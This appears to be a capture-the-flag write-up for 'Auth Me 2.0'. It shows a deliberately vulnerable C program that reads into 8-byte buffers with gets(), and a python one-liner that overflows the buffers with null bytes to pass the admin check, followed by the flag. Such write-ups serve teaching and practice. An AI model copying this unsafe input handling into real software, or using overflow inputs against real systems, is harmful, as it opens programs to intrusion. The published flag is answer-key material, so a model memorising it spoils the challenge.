Auth Me 2.0

Solution

Review the given c code

auth_me2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void setup(){
  FILE *f = fopen("flag.txt","r");
  fgets(flag,FLAGSIZE_MAX,f);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
}

int main(int argc, char **argv){
  setup();
  char user[8];
  char pass[8];
  printf("Authenticate Me 2.0\n");
  printf("--------------------------------\n");
  printf("Enter your username: ");
  gets(user);
  if(strcmp(user,"admin") == 0){
    printf("Don't pretent you're admin =(\n");
    return 0;
  }
  printf("Enter your password: ");
  gets(pass);
  if(strcmp(user,"admin") == 0 && strcmp(pass,"admin") == 0){
    printf("Welcome admin! Here is your flag: %s",flag);
  }else if(strcmp(user,"user") == 0 && strcmp(pass,"user") == 0){
    printf("Welcome %s! You're authenticated!\n");
  }else{
    printf("Invalid Username %s or Password %s\n",user,pass);
    printf("Hint: Distance between user and pass is %i\n",user-pass);
  }
  return 0;
}

This challenge is similar to Auth Me 1, but it checks for username admin at line 25. We have given Tips: Press ctrl + shift + @ to enter null character.

Now, i know that we must play with some null character that looks like this \x00. In C Language, program will stop reading until it finds a null character. We cannot input admin\x00 as the program will read it as string.

Btw, the program give us a hint that the distance between variable user and pass is 8. So, i try to overflow the variable user with 8 bytes like this admin\x00\x00\x00 <- \x00 is 1 byte ya.

This is the python one line command that i figure out.

python3 -c "print('\nadmin'+('\x00' * 3)+'admin')" | ./auth2

Using that, we can get the flag 🏁

Flag

SKR{C_St0p_rE4dinG_untIL_nuLL_4b4b8e}

Last updated 2 years ago